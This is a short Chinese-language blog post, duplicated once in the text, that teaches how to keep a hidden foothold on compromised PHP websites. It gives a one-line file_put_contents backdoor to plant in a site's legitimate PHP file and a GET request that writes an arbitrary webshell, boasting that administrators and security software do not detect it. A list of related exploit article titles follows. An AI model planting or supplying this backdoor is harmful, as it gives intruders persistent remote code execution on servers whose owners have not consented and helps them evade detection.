PHP_GET后门,躲避任何安全软件
2016-01-23 17:48
489 查看
经常拿到一些比较好的php站想要留住。插入菜刀一句话,很容易被管理发现,不管是eval还是assert,就是管理发现不了,有时连接也会被各种的安全软件拦截。
现在教大家一个简单的技巧。本人一直在用,留的后门没有被删过了。
<?php
file_put_contents('xpxp.php',"$_GET[uname]"); //此段代码插入它正常的PHP里面,最好插头部。
复制代码利用也很简单,在插入的PHP文件的后面加入get传参,
http://xxxxxxx.com/xxx.php?uname=插入内容,随便放,可以放一句话或者神马的,发挥自己想象了。
执行以后在插入的PHP当前文件夹下面生成一个xpxp.php 。
现在教大家一个简单的技巧。本人一直在用,留的后门没有被删过了。
<?php
file_put_contents('xpxp.php',"$_GET[uname]"); //此段代码插入它正常的PHP里面,最好插头部。
复制代码利用也很简单,在插入的PHP文件的后面加入get传参,
http://xxxxxxx.com/xxx.php?uname=插入内容,随便放,可以放一句话或者神马的,发挥自己想象了。
执行以后在插入的PHP当前文件夹下面生成一个xpxp.php 。
相关文章推荐
- Thinkphp 漏洞小试
- PHP_GET后门,躲避任何安全软件
- Thinkphp 漏洞小试
- php截取后台登陆密码的代码
- php截取后台登陆密码的代码
- ThinkPHP最新版本SQL注入漏洞
- ThinkPHP最新版本SQL注入漏洞
- 重大漏洞!PHP multipart/form-data头部解析远程拒绝服务漏洞
- 重大漏洞!PHP multipart/form-data头部解析远程拒绝服务漏洞
- Matplotib tutorial(2)
- phpcms某处储存型XSS(demo+本地演示)
- phpcms某处储存型XSS(demo+本地演示)
- ThinkPHP的静态缓存,非系统写法。
- VC FTP服务器程序分析(三)
- PHP JSON取数据
- iis7运行php时出现FastCGI进程意外退出的解决方案
- PHP中常见的五种设计模式
- Zend studio13 导入已有php文件夹
- Windows客户端访问vsftpd服务器中文乱码问题解决
- php非阻塞访问url 解析socket阻塞与非阻塞,同步与异步